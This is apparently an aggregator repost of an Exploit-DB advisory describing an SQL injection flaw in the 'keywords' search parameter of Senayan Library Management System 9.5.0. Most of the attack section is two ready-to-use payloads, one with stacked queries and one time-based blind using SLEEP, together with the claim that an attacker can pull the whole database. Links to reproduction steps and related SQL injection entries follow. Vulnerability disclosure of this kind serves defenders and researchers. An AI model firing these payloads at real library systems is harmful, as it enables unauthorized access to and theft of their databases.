[webapps] Senayan Library Management System v9.5.0 - SQL Injection
source link: https://www.exploit-db.com/exploits/51120
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Senayan Library Management System v9.5.0 - SQL Injection
## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Recommend
-
8
Human Resource Management System 1.0 - SQL Injection (unauthenticated)...
-
4
EQ Enterprise management system v2.2.0 - SQL Injection ...
-
9
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated...
-
7
Intern Record System v1.0 - SQL Injection (Unauthenticated)
-
4
Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?)...
-
8
Auto Dealer Management System v1.0 - SQL Injection on manage_user.php...
-
6
Art Gallery Management System Project in PHP v 1.0 - SQL injection...
-
6
Service Provider Management System v1.0 - SQL Injection ...
-
2
Faculty Evaluation System v1.0 - SQL Injection ...
-
9
Global - Multi School Management System Express v1.0- SQL Injection...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK